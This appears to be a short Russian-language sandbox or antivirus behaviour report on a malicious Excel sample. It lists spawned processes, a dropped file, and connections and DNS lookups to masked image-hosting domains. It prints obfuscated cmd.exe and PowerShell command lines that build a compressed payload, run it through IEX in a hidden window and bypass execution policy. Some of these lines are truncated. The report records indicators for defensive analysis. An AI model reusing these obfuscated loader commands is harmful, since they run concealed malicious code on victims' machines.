Техническая информация
- '<SYSTEM32>\cmd.exe' /C"sET knuY= ( .('n'+'e'+("{0}{1}{2}"-f 'w','-OBj','Ect')) (("{1}{0}"-f'Com','iO.')+("{0}{1}" -f 'pRESs','I')+("{0}{1}" -f 'o','N.DEf')+("{0}{1}"-f'la','tes')+("{1}{0}" -f 'Am','tRe'))( [io.m...
- <Текущая директория>\fdd21000
- <PATH_SAMPLE>.xls
- 'i.##gur.com':443
- 'im####2.imgbox.com':443
- 'i.##gur.com':443
- 'im####2.imgbox.com':443
- DNS ASK i.##gur.com
- DNS ASK im####2.imgbox.com
- '<SYSTEM32>\cmd.exe' /C"sET knuY= ( .('n'+'e'+("{0}{1}{2}"-f 'w','-OBj','Ect')) (("{1}{0}"-f'Com','iO.')+("{0}{1}" -f 'pRESs','I')+("{0}{1}" -f 'o','N.DEf')+("{0}{1}"-f'la','tes')+("{1}{0}" -f 'Am','tRe'))( [io.m...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C%TPb%
- '<SYSTEM32>\cmd.exe' /S /D /c" eCHo IEX (DIR enV:KNuy).Value"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nopROFi -NoNInTERACtI -WInDOWsTY hidDen -noLog -EXECut bYPASs -c .( $PShome[21]+$psHOme[30]+'x')( ${iNPUT})